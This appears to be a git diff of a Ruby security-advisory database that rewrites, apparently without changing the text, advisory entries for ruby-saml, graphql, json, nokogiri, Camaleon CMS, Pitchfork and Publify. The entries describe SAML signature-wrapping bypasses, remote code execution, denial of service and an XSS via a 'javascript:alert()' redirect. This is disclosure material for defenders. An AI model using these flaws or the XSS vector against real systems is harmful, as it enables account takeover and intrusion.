-    - https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials
-    - https://github.com/advisories/GHSA-754f-8gm6-c4r2
----
+---
+layout: advisory
+title: 'CVE-2025-25292 (ruby-saml): Ruby SAML allows a SAML authentication bypass
+  due to namespace handling (parser differential)'
+comments: false
+categories:
+- ruby-saml
+advisory:
+  gem: ruby-saml
+  cve: 2025-25292
+  ghsa: 754f-8gm6-c4r2
+  url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-754f-8gm6-c4r2
+  title: Ruby SAML allows a SAML authentication bypass due to namespace handling (parser
+    differential)
+  date: 2025-03-12
+  description: |-
+    ### Summary
+    An authentication bypass vulnerability was found in ruby-saml due to a parser differential.
+    ReXML and Nokogiri parse XML differently, the parsers can generate entirely
+    different document structures from the same XML input. That allows an
+    attacker to be able to execute a Signature Wrapping attack.
+
+    ### Impact
+    This issue may lead to authentication bypass.
+  cvss_v3: 9.8
+  cvss_v4: 8.8
+  patched_versions:
+  - "~> 1.12.4"
+  - ">= 1.18.0"
+  related:
+    url:
+    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-754f-8gm6-c4r2
+    - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv
+    - https://github.com/SAML-Toolkits/ruby-saml/commit/e76c5b36bac40aedbf1ba7ffaaf495be63328cd9
+    - https://github.com/SAML-Toolkits/ruby-saml/commit/e9c1cdbd0f9afa467b585de279db0cbd0fb8ae97
+    - https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released
+    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.12.4
+    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.0
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-25292
+    - https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials
+    - https://github.com/advisories/GHSA-754f-8gm6-c4r2
+---
diff --git a/advisories/_posts/2025-03-12-CVE-2025-25293.md b/advisories/_posts/2025-03-12-CVE-2025-25293.md
index 5d9a4b14..9c6fd35b 100644
--- a/advisories/_posts/2025-03-12-CVE-2025-25293.md
+++ b/advisories/_posts/2025-03-12-CVE-2025-25293.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2025-25293 (ruby-saml): Ruby SAML allows remote Denial of Service (DoS)
-  with compressed SAML responses'
-comments: false
-categories:
-- ruby-saml
-advisory:
-  gem: ruby-saml
-  cve: 2025-25293
-  ghsa: 92rq-c8cf-prrq
-  url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-92rq-c8cf-prrq
-  title: Ruby SAML allows remote Denial of Service (DoS) with compressed SAML responses
-  date: 2025-03-12
-  description: |-
-    ### Summary
-    ruby-saml is susceptible to remote Denial of Service (DoS) with compressed SAML responses.
-
-    Ruby-saml uses zlib to decompress SAML responses in case they're compressed.
-    It is possible to bypass the message size check with a compressed assertion
-    since the message size is checked before inflation and not after.
-
-    ### Impact
-    This issue may lead to remote Denial of Service (DoS).
-  cvss_v3: 7.5
-  cvss_v4: 8.8
-  patched_versions:
-  - "~> 1.12.4"
-  - ">= 1.18.0"
-  related:
-    url:
-    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-92rq-c8cf-prrq
-    - https://github.com/SAML-Toolkits/ruby-saml/commit/acac9e9cc0b9a507882c614f25d41f8b47be349a
-    - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-25293
-    - https://github.com/SAML-Toolkits/ruby-saml/commit/e2da4c6dae7dc01a4d9cd221395140a67e2b3eb1
-    - https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released
-    - https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials
-    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.12.4
-    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.0
-    - https://github.com/advisories/GHSA-92rq-c8cf-prrq
----
+---
+layout: advisory
+title: 'CVE-2025-25293 (ruby-saml): Ruby SAML allows remote Denial of Service (DoS)
+  with compressed SAML responses'
+comments: false
+categories:
+- ruby-saml
+advisory:
+  gem: ruby-saml
+  cve: 2025-25293
+  ghsa: 92rq-c8cf-prrq
+  url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-92rq-c8cf-prrq
+  title: Ruby SAML allows remote Denial of Service (DoS) with compressed SAML responses
+  date: 2025-03-12
+  description: |-
+    ### Summary
+    ruby-saml is susceptible to remote Denial of Service (DoS) with compressed SAML responses.
+
+    Ruby-saml uses zlib to decompress SAML responses in case they're compressed.
+    It is possible to bypass the message size check with a compressed assertion
+    since the message size is checked before inflation and not after.
+
+    ### Impact
+    This issue may lead to remote Denial of Service (DoS).
+  cvss_v3: 7.5
+  cvss_v4: 8.8
+  patched_versions:
+  - "~> 1.12.4"
+  - ">= 1.18.0"
+  related:
+    url:
+    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-92rq-c8cf-prrq
+    - https://github.com/SAML-Toolkits/ruby-saml/commit/acac9e9cc0b9a507882c614f25d41f8b47be349a
+    - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-25293
+    - https://github.com/SAML-Toolkits/ruby-saml/commit/e2da4c6dae7dc01a4d9cd221395140a67e2b3eb1
+    - https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released
+    - https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials
+    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.12.4
+    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.0
+    - https://github.com/advisories/GHSA-92rq-c8cf-prrq
+---
diff --git a/advisories/_posts/2025-03-12-CVE-2025-27407.md b/advisories/_posts/2025-03-12-CVE-2025-27407.md
index 881a1499..88a99de9 100644
--- a/advisories/_posts/2025-03-12-CVE-2025-27407.md
+++ b/advisories/_posts/2025-03-12-CVE-2025-27407.md
@@ -1,49 +1,49 @@
----
-layout: advisory
-title: 'CVE-2025-27407 (graphql): graphql allows remote code execution when loading
-  a crafted GraphQL schema'
-comments: false
-categories:
-- graphql
-advisory:
-  gem: graphql
-  cve: 2025-27407
-  ghsa: q92j-grw3-h492
-  url: https://github.com/rmosolgo/graphql-ruby/security/advisories/GHSA-q92j-grw3-h492
-  title: graphql allows remote code execution when loading a crafted GraphQL schema
-  date: 2025-03-12
-  description: |
-    Loading a malicious schema definition in
-    `GraphQL::Schema.from_introspection` (or `GraphQL::Schema::Loader.load`)
-    can result in remote code execution. Any system which loads a schema
-    by JSON from an untrusted source is vulnerable, including those that
-    use [GraphQL::Client](https://github.com/github-community-projects/graphql-client)
-    to load external schemas via GraphQL introspection.
-  cvss_v3: 9.1
-  unaffected_versions:
-  - "< 1.11.5"
-  patched_versions:
-  - "~> 1.11.11"
-  - "~> 1.12.25"
-  - "~> 1.13.24"
-  - "~> 2.0.32"
-  - "~> 2.1.15"
-  - "~> 2.2.17"
-  - "~> 2.3.21"
-  - ">= 2.4.13"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-27407
-    - https://github.com/github-community-projects/graphql-client
-    - https://github.com/rmosolgo/graphql-ruby/security/advisories/GHSA-q92j-grw3-h492
-    - https://github.com/rmosolgo/graphql-ruby/commit/e58676c70aa695e3052ba1fbc787efee4ba7d67e
-    - https://github.com/rmosolgo/graphql-ruby/commit/28233b16c0eb9d0fb7808f4980e061dc7507c4cd
-    - https://github.com/rmosolgo/graphql-ruby/commit/2d2f4ed1f79472f8eed29c864b039649e1de238f
-    - https://github.com/rmosolgo/graphql-ruby/commit/5c5a7b9a9bdce143be048074aea50edb7bb747be
-    - https://github.com/rmosolgo/graphql-ruby/commit/6eca16b9fa553aa957099a30dbde64ddcdac52ca
-    - https://github.com/rmosolgo/graphql-ruby/commit/d0963289e0dab4ea893bbecf12bb7d89294957bb
-    - https://github.com/rmosolgo/graphql-ruby/commit/d1117ae0361d9ed67e0795b07f5c3e98e62f3c7c
-    - https://github.com/rmosolgo/graphql-ruby/commit/e3b33ace05391da2871c75ab4d3b66e29133b367
-    - https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released
-    - https://github.com/advisories/GHSA-q92j-grw3-h492
----
+---
+layout: advisory
+title: 'CVE-2025-27407 (graphql): graphql allows remote code execution when loading
+  a crafted GraphQL schema'
+comments: false
+categories:
+- graphql
+advisory:
+  gem: graphql
+  cve: 2025-27407
+  ghsa: q92j-grw3-h492
+  url: https://github.com/rmosolgo/graphql-ruby/security/advisories/GHSA-q92j-grw3-h492
+  title: graphql allows remote code execution when loading a crafted GraphQL schema
+  date: 2025-03-12
+  description: |
+    Loading a malicious schema definition in
+    `GraphQL::Schema.from_introspection` (or `GraphQL::Schema::Loader.load`)
+    can result in remote code execution. Any system which loads a schema
+    by JSON from an untrusted source is vulnerable, including those that
+    use [GraphQL::Client](https://github.com/github-community-projects/graphql-client)
+    to load external schemas via GraphQL introspection.
+  cvss_v3: 9.1
+  unaffected_versions:
+  - "< 1.11.5"
+  patched_versions:
+  - "~> 1.11.11"
+  - "~> 1.12.25"
+  - "~> 1.13.24"
+  - "~> 2.0.32"
+  - "~> 2.1.15"
+  - "~> 2.2.17"
+  - "~> 2.3.21"
+  - ">= 2.4.13"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-27407
+    - https://github.com/github-community-projects/graphql-client
+    - https://github.com/rmosolgo/graphql-ruby/security/advisories/GHSA-q92j-grw3-h492
+    - https://github.com/rmosolgo/graphql-ruby/commit/e58676c70aa695e3052ba1fbc787efee4ba7d67e
+    - https://github.com/rmosolgo/graphql-ruby/commit/28233b16c0eb9d0fb7808f4980e061dc7507c4cd
+    - https://github.com/rmosolgo/graphql-ruby/commit/2d2f4ed1f79472f8eed29c864b039649e1de238f
+    - https://github.com/rmosolgo/graphql-ruby/commit/5c5a7b9a9bdce143be048074aea50edb7bb747be
+    - https://github.com/rmosolgo/graphql-ruby/commit/6eca16b9fa553aa957099a30dbde64ddcdac52ca
+    - https://github.com/rmosolgo/graphql-ruby/commit/d0963289e0dab4ea893bbecf12bb7d89294957bb
+    - https://github.com/rmosolgo/graphql-ruby/commit/d1117ae0361d9ed67e0795b07f5c3e98e62f3c7c
+    - https://github.com/rmosolgo/graphql-ruby/commit/e3b33ace05391da2871c75ab4d3b66e29133b367
+    - https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released
+    - https://github.com/advisories/GHSA-q92j-grw3-h492
+---
diff --git a/advisories/_posts/2025-03-12-CVE-2025-27788.md b/advisories/_posts/2025-03-12-CVE-2025-27788.md
index b480d960..1ffccd58 100644
--- a/advisories/_posts/2025-03-12-CVE-2025-27788.md
+++ b/advisories/_posts/2025-03-12-CVE-2025-27788.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2025-27788 (json): Out-of-bounds Read in Ruby JSON Parser'
-comments: false
-categories:
-- json
-advisory:
-  gem: json
-  cve: 2025-27788
-  ghsa: 9m3q-rhmv-5q44
-  url: https://github.com/ruby/json/security/advisories/GHSA-9m3q-rhmv-5q44
-  title: Out-of-bounds Read in Ruby JSON Parser
-  date: 2025-03-12
-  description: |
-    ### Impact
-
-    A specially crafted document could cause an out of bound read,
-    most likely resulting in a crash.
-
-    Versions 2.10.0 and 2.10.1 are impacted. Older versions are not.
-
-    ### Patches
-
-    Version 2.10.2 fixes the problem.
-
-    ### Workarounds
-
-    None.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 2.10.0"
-  patched_versions:
-  - ">= 2.10.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-27788
-    - https://github.com/ruby/json/security/advisories/GHSA-9m3q-rhmv-5q44
-    - https://github.com/ruby/json/releases/tag/v2.10.2
-    - https://github.com/ruby/json/commit/c56db31f800d5d508389793e69682f99749dbadf
-    - https://github.com/advisories/GHSA-9m3q-rhmv-5q44
----
+---
+layout: advisory
+title: 'CVE-2025-27788 (json): Out-of-bounds Read in Ruby JSON Parser'
+comments: false
+categories:
+- json
+advisory:
+  gem: json
+  cve: 2025-27788
+  ghsa: 9m3q-rhmv-5q44
+  url: https://github.com/ruby/json/security/advisories/GHSA-9m3q-rhmv-5q44
+  title: Out-of-bounds Read in Ruby JSON Parser
+  date: 2025-03-12
+  description: |
+    ### Impact
+
+    A specially crafted document could cause an out of bound read,
+    most likely resulting in a crash.
+
+    Versions 2.10.0 and 2.10.1 are impacted. Older versions are not.
+
+    ### Patches
+
+    Version 2.10.2 fixes the problem.
+
+    ### Workarounds
+
+    None.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 2.10.0"
+  patched_versions:
+  - ">= 2.10.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-27788
+    - https://github.com/ruby/json/security/advisories/GHSA-9m3q-rhmv-5q44
+    - https://github.com/ruby/json/releases/tag/v2.10.2
+    - https://github.com/ruby/json/commit/c56db31f800d5d508389793e69682f99749dbadf
+    - https://github.com/advisories/GHSA-9m3q-rhmv-5q44
+---
diff --git a/advisories/_posts/2025-03-12-GHSA-hw46-3hmr-x9xv.md b/advisories/_posts/2025-03-12-GHSA-hw46-3hmr-x9xv.md
index f9989bb0..5dfa22fe 100644
--- a/advisories/_posts/2025-03-12-GHSA-hw46-3hmr-x9xv.md
+++ b/advisories/_posts/2025-03-12-GHSA-hw46-3hmr-x9xv.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'GHSA-hw46-3hmr-x9xv (omniauth-saml): omniauth-saml has dependency on ruby-saml
-  version with Signature Wrapping Attack issue'
-comments: false
-categories:
-- omniauth-saml
-advisory:
-  gem: omniauth-saml
-  ghsa: hw46-3hmr-x9xv
-  url: https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv
-  title: omniauth-saml has dependency on ruby-saml version with Signature Wrapping
-    Attack issue
-  date: 2025-03-12
-  description: |-
-    ### Summary
-    There are 2 new Critical Signature Wrapping Vulnerabilities (CVE-2025-25292, CVE-2025-25291) and a potential DDOS Moderated Vulneratiblity (CVE-2025-25293) affecting ruby-saml, a dependency of omniauth-saml.
-
-    The fix will be applied to ruby-saml and released 12 March 2025, under version 1.18.0.
-
-    Please [upgrade](https://github.com/omniauth/omniauth-saml/blob/master/omniauth-saml.gemspec#L16) the ruby-saml requirement to v1.18.0.
-
-    ### Impact
-    Signature Wrapping Vulnerabilities allows an attacker to impersonate a user.
-  cvss_v4: 9.3
-  patched_versions:
-  - "~> 1.10.6"
-  - "~> 2.1.3"
-  - ">= 2.2.3"
-  related:
-    url:
-    - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv
-    - https://github.com/omniauth/omniauth-saml/commit/0d5eaa0d808acb2ac96deadf5c750ac1cf2d92b5
-    - https://github.com/omniauth/omniauth-saml/commit/2c8a482801808bbcb0188214bde74680b8018a35
-    - https://github.com/omniauth/omniauth-saml/commit/7a348b49083462a566af41a5ae85e9f3af15b985
-    - https://github.com/omniauth/omniauth-saml/blob/master/omniauth-saml.gemspec#L16
-    - https://rubygems.org/gems/omniauth-saml/versions/2.2.3
-    - https://github.com/advisories/GHSA-hw46-3hmr-x9xv
----
+---
+layout: advisory
+title: 'GHSA-hw46-3hmr-x9xv (omniauth-saml): omniauth-saml has dependency on ruby-saml
+  version with Signature Wrapping Attack issue'
+comments: false
+categories:
+- omniauth-saml
+advisory:
+  gem: omniauth-saml
+  ghsa: hw46-3hmr-x9xv
+  url: https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv
+  title: omniauth-saml has dependency on ruby-saml version with Signature Wrapping
+    Attack issue
+  date: 2025-03-12
+  description: |-
+    ### Summary
+    There are 2 new Critical Signature Wrapping Vulnerabilities (CVE-2025-25292, CVE-2025-25291) and a potential DDOS Moderated Vulneratiblity (CVE-2025-25293) affecting ruby-saml, a dependency of omniauth-saml.
+
+    The fix will be applied to ruby-saml and released 12 March 2025, under version 1.18.0.
+
+    Please [upgrade](https://github.com/omniauth/omniauth-saml/blob/master/omniauth-saml.gemspec#L16) the ruby-saml requirement to v1.18.0.
+
+    ### Impact
+    Signature Wrapping Vulnerabilities allows an attacker to impersonate a user.
+  cvss_v4: 9.3
+  patched_versions:
+  - "~> 1.10.6"
+  - "~> 2.1.3"
+  - ">= 2.2.3"
+  related:
+    url:
+    - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv
+    - https://github.com/omniauth/omniauth-saml/commit/0d5eaa0d808acb2ac96deadf5c750ac1cf2d92b5
+    - https://github.com/omniauth/omniauth-saml/commit/2c8a482801808bbcb0188214bde74680b8018a35
+    - https://github.com/omniauth/omniauth-saml/commit/7a348b49083462a566af41a5ae85e9f3af15b985
+    - https://github.com/omniauth/omniauth-saml/blob/master/omniauth-saml.gemspec#L16
+    - https://rubygems.org/gems/omniauth-saml/versions/2.2.3
+    - https://github.com/advisories/GHSA-hw46-3hmr-x9xv
+---
diff --git a/advisories/_posts/2025-03-14-CVE-2025-2304.md b/advisories/_posts/2025-03-14-CVE-2025-2304.md
index 28dc94f8..6a241bb6 100644
--- a/advisories/_posts/2025-03-14-CVE-2025-2304.md
+++ b/advisories/_posts/2025-03-14-CVE-2025-2304.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2025-2304 (camaleon_cms): Camaleon CMS Vulnerable to Privilege Escalation
-  through a Mass Assignment'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  cve: 2025-2304
-  ghsa: rp28-mvq3-wf8j
-  url: https://github.com/advisories/GHSA-rp28-mvq3-wf8j
-  title: Camaleon CMS Vulnerable to Privilege Escalation through a Mass Assignment
-  date: 2025-03-14
-  description: |
-    A Privilege Escalation through a Mass Assignment exists in Camaleon CMS
-
-    When a user wishes to change his password, the 'updated_ajax' method
-    of the UsersController is called. The vulnerability stems from the
-    use of the dangerous permit! method, which allows all parameters to
-    pass through without any filtering.
-  cvss_v4: 9.4
-  patched_versions:
-  - ">= 2.9.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-2304
-    - https://www.tenable.com/security/research/tra-2025-09
-    - https://github.com/owen2345/camaleon-cms/pull/1109
-    - https://github.com/owen2345/camaleon-cms/commit/179fd6b1ecf258d3e214aebfa87ac4a322ea4db4
-    - https://github.com/owen2345/camaleon-cms/releases/tag/2.9.1
-    - https://github.com/advisories/GHSA-rp28-mvq3-wf8j
----
+---
+layout: advisory
+title: 'CVE-2025-2304 (camaleon_cms): Camaleon CMS Vulnerable to Privilege Escalation
+  through a Mass Assignment'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  cve: 2025-2304
+  ghsa: rp28-mvq3-wf8j
+  url: https://github.com/advisories/GHSA-rp28-mvq3-wf8j
+  title: Camaleon CMS Vulnerable to Privilege Escalation through a Mass Assignment
+  date: 2025-03-14
+  description: |
+    A Privilege Escalation through a Mass Assignment exists in Camaleon CMS
+
+    When a user wishes to change his password, the 'updated_ajax' method
+    of the UsersController is called. The vulnerability stems from the
+    use of the dangerous permit! method, which allows all parameters to
+    pass through without any filtering.
+  cvss_v4: 9.4
+  patched_versions:
+  - ">= 2.9.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-2304
+    - https://www.tenable.com/security/research/tra-2025-09
+    - https://github.com/owen2345/camaleon-cms/pull/1109
+    - https://github.com/owen2345/camaleon-cms/commit/179fd6b1ecf258d3e214aebfa87ac4a322ea4db4
+    - https://github.com/owen2345/camaleon-cms/releases/tag/2.9.1
+    - https://github.com/advisories/GHSA-rp28-mvq3-wf8j
+---
diff --git a/advisories/_posts/2025-03-14-GHSA-mrxw-mxhj-p664.md b/advisories/_posts/2025-03-14-GHSA-mrxw-mxhj-p664.md
index a873225c..69a77f5e 100644
--- a/advisories/_posts/2025-03-14-GHSA-mrxw-mxhj-p664.md
+++ b/advisories/_posts/2025-03-14-GHSA-mrxw-mxhj-p664.md
@@ -1,52 +1,52 @@
----
-layout: advisory
-title: 'GHSA-mrxw-mxhj-p664 (nokogiri): Nokogiri updates packaged libxslt to v1.1.43
-  to resolve multiple CVEs'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  ghsa: mrxw-mxhj-p664
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-mrxw-mxhj-p664
-  title: Nokogiri updates packaged libxslt to v1.1.43 to resolve multiple CVEs
-  date: 2025-03-14
-  description: |
-    ## Summary
-
-    Nokogiri v1.18.4 upgrades its dependency libxslt to
-    [v1.1.43](https://gitlab.gnome.org/GNOME/libxslt/-/releases/v1.1.43).
-
-    libxslt v1.1.43 resolves:
-
-    - CVE-2025-24855: Fix use-after-free of XPath context node
-    - CVE-2024-55549: Fix UAF related to excluded namespaces
-
-    ## Impact
-
-    ### CVE-2025-24855
-
-    - "Use-after-free due to xsltEvalXPathStringNs leaking xpathCtxt->node"
-    - MITRE has rated this 7.8 High CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H
-    - Upstream report: https://gitlab.gnome.org/GNOME/libxslt/-/issues/128
-    - NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2025-24855
-
-    ### CVE-2024-55549
-
-    - "Use-after-free related to excluded result prefixes"
-    - MITRE has rated this 7.8 High CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H
-    - Upstream report: https://gitlab.gnome.org/GNOME/libxslt/-/issues/127
-    - NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2024-55549
-  cvss_v3: 7.8
-  patched_versions:
-  - ">= 1.18.4"
-  related:
-    url:
-    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-mrxw-mxhj-p664
-    - https://gitlab.gnome.org/GNOME/libxslt/-/issues/127
-    - https://gitlab.gnome.org/GNOME/libxslt/-/issues/128
-    - https://github.com/advisories/GHSA-mrxw-mxhj-p664
-    cve:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-55549
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-24855
----
+---
+layout: advisory
+title: 'GHSA-mrxw-mxhj-p664 (nokogiri): Nokogiri updates packaged libxslt to v1.1.43
+  to resolve multiple CVEs'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  ghsa: mrxw-mxhj-p664
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-mrxw-mxhj-p664
+  title: Nokogiri updates packaged libxslt to v1.1.43 to resolve multiple CVEs
+  date: 2025-03-14
+  description: |
+    ## Summary
+
+    Nokogiri v1.18.4 upgrades its dependency libxslt to
+    [v1.1.43](https://gitlab.gnome.org/GNOME/libxslt/-/releases/v1.1.43).
+
+    libxslt v1.1.43 resolves:
+
+    - CVE-2025-24855: Fix use-after-free of XPath context node
+    - CVE-2024-55549: Fix UAF related to excluded namespaces
+
+    ## Impact
+
+    ### CVE-2025-24855
+
+    - "Use-after-free due to xsltEvalXPathStringNs leaking xpathCtxt->node"
+    - MITRE has rated this 7.8 High CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H
+    - Upstream report: https://gitlab.gnome.org/GNOME/libxslt/-/issues/128
+    - NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2025-24855
+
+    ### CVE-2024-55549
+
+    - "Use-after-free related to excluded result prefixes"
+    - MITRE has rated this 7.8 High CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H
+    - Upstream report: https://gitlab.gnome.org/GNOME/libxslt/-/issues/127
+    - NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2024-55549
+  cvss_v3: 7.8
+  patched_versions:
+  - ">= 1.18.4"
+  related:
+    url:
+    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-mrxw-mxhj-p664
+    - https://gitlab.gnome.org/GNOME/libxslt/-/issues/127
+    - https://gitlab.gnome.org/GNOME/libxslt/-/issues/128
+    - https://github.com/advisories/GHSA-mrxw-mxhj-p664
+    cve:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-55549
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-24855
+---
diff --git a/advisories/_posts/2025-03-27-CVE-2025-30221.md b/advisories/_posts/2025-03-27-CVE-2025-30221.md
index e196e023..28bbbf18 100644
--- a/advisories/_posts/2025-03-27-CVE-2025-30221.md
+++ b/advisories/_posts/2025-03-27-CVE-2025-30221.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2025-30221 (pitchfork): Pitchfork HTTP Request/Response Splitting vulnerability'
-comments: false
-categories:
-- pitchfork
-advisory:
-  gem: pitchfork
-  cve: 2025-30221
-  ghsa: pfqj-w6r6-g86v
-  url: https://github.com/Shopify/pitchfork/security/advisories/GHSA-pfqj-w6r6-g86v
-  title: Pitchfork HTTP Request/Response Splitting vulnerability
-  date: 2025-03-27
-  description: |
-    ### Impact
-    HTTP Response Header Injection in Pitchfork Versions < 0.11.0
-    when used in conjunction with Rack 3
-
-    ### Patches
-    The issue was fixed in Pitchfork release 0.11.0
-
-    ### Workarounds
-    There are no known work arounds. Users must upgrade.
-  cvss_v3: 4.3
-  patched_versions:
-  - ">= 0.11.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-30221
-    - https://github.com/Shopify/pitchfork/security/advisories/GHSA-pfqj-w6r6-g86v
-    - https://github.com/Shopify/pitchfork/commit/17ed9b61bf9f58957065f7405b66102daf86bf55
-    - https://github.com/advisories/GHSA-pfqj-w6r6-g86v
----
+---
+layout: advisory
+title: 'CVE-2025-30221 (pitchfork): Pitchfork HTTP Request/Response Splitting vulnerability'
+comments: false
+categories:
+- pitchfork
+advisory:
+  gem: pitchfork
+  cve: 2025-30221
+  ghsa: pfqj-w6r6-g86v
+  url: https://github.com/Shopify/pitchfork/security/advisories/GHSA-pfqj-w6r6-g86v
+  title: Pitchfork HTTP Request/Response Splitting vulnerability
+  date: 2025-03-27
+  description: |
+    ### Impact
+    HTTP Response Header Injection in Pitchfork Versions < 0.11.0
+    when used in conjunction with Rack 3
+
+    ### Patches
+    The issue was fixed in Pitchfork release 0.11.0
+
+    ### Workarounds
+    There are no known work arounds. Users must upgrade.
+  cvss_v3: 4.3
+  patched_versions:
+  - ">= 0.11.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-30221
+    - https://github.com/Shopify/pitchfork/security/advisories/GHSA-pfqj-w6r6-g86v
+    - https://github.com/Shopify/pitchfork/commit/17ed9b61bf9f58957065f7405b66102daf86bf55
+    - https://github.com/advisories/GHSA-pfqj-w6r6-g86v
+---
diff --git a/advisories/_posts/2025-03-28-CVE-2024-39311.md b/advisories/_posts/2025-03-28-CVE-2024-39311.md
index 1ea6d8e1..b8701f5e 100644
--- a/advisories/_posts/2025-03-28-CVE-2024-39311.md
+++ b/advisories/_posts/2025-03-28-CVE-2024-39311.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2024-39311 (publify_core): Publify Vulnerable To Cross-Site Scripting
-  (XSS) Via Redirects Requiring User Interaction'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2024-39311
-  ghsa: 8fm5-gg2f-f66q
-  url: https://github.com/publify/publify/security/advisories/GHSA-8fm5-gg2f-f66q
-  title: Publify Vulnerable To Cross-Site Scripting (XSS) Via Redirects Requiring
-    User Interaction
-  date: 2025-03-28
-  description: |
-    ### Summary
-
-    A publisher on a `publify` application is able to perform a cross-site
-    scripting attack on an administrator using the redirect functionality.
-
-    ### Details
-
-    A publisher on a `publify` application is able to perform a cross-site
-    scripting attack on an administrator using the redirect functionality.
-    The exploitation of this XSS vulnerability requires the administrator
-    to click a malicious link.
-
-    We can create a redirect to a `javascript:alert()` URL. Whilst the
-    redirect itself doesn't work, on the administrative panel, an a tag
-    is created with the payload as the URI. Upon clicking this link,
-    the XSS is triggered.
-
-    An attack could attempt to hide their payload by using HTML, or
-    other encodings, as to not make it obvious to an administrator
-    that this is a malicious link.
-
-    ### Impact
-
-    A publisher may attempt to use this vulnerability to escalate their
-    privileges and become an administrator."
-  cvss_v4: 1.8
-  patched_versions:
-  - ">= 10.0.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-39311
-    - https://github.com/publify/publify/security/advisories/GHSA-8fm5-gg2f-f66q
-    - https://github.com/advisories/GHSA-8fm5-gg2f-f66q
----
+---
+layout: advisory
+title: 'CVE-2024-39311 (publify_core): Publify Vulnerable To Cross-Site Scripting
+  (XSS) Via Redirects Requiring User Interaction'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2024-39311
+  ghsa: 8fm5-gg2f-f66q
+  url: https://github.com/publify/publify/security/advisories/GHSA-8fm5-gg2f-f66q
+  title: Publify Vulnerable To Cross-Site Scripting (XSS) Via Redirects Requiring
+    User Interaction
+  date: 2025-03-28
+  description: |
+    ### Summary
+
+    A publisher on a `publify` application is able to perform a cross-site
+    scripting attack on an administrator using the redirect functionality.
+
+    ### Details
+
+    A publisher on a `publify` application is able to perform a cross-site
+    scripting attack on an administrator using the redirect functionality.
+    The exploitation of this XSS vulnerability requires the administrator
+    to click a malicious link.
+
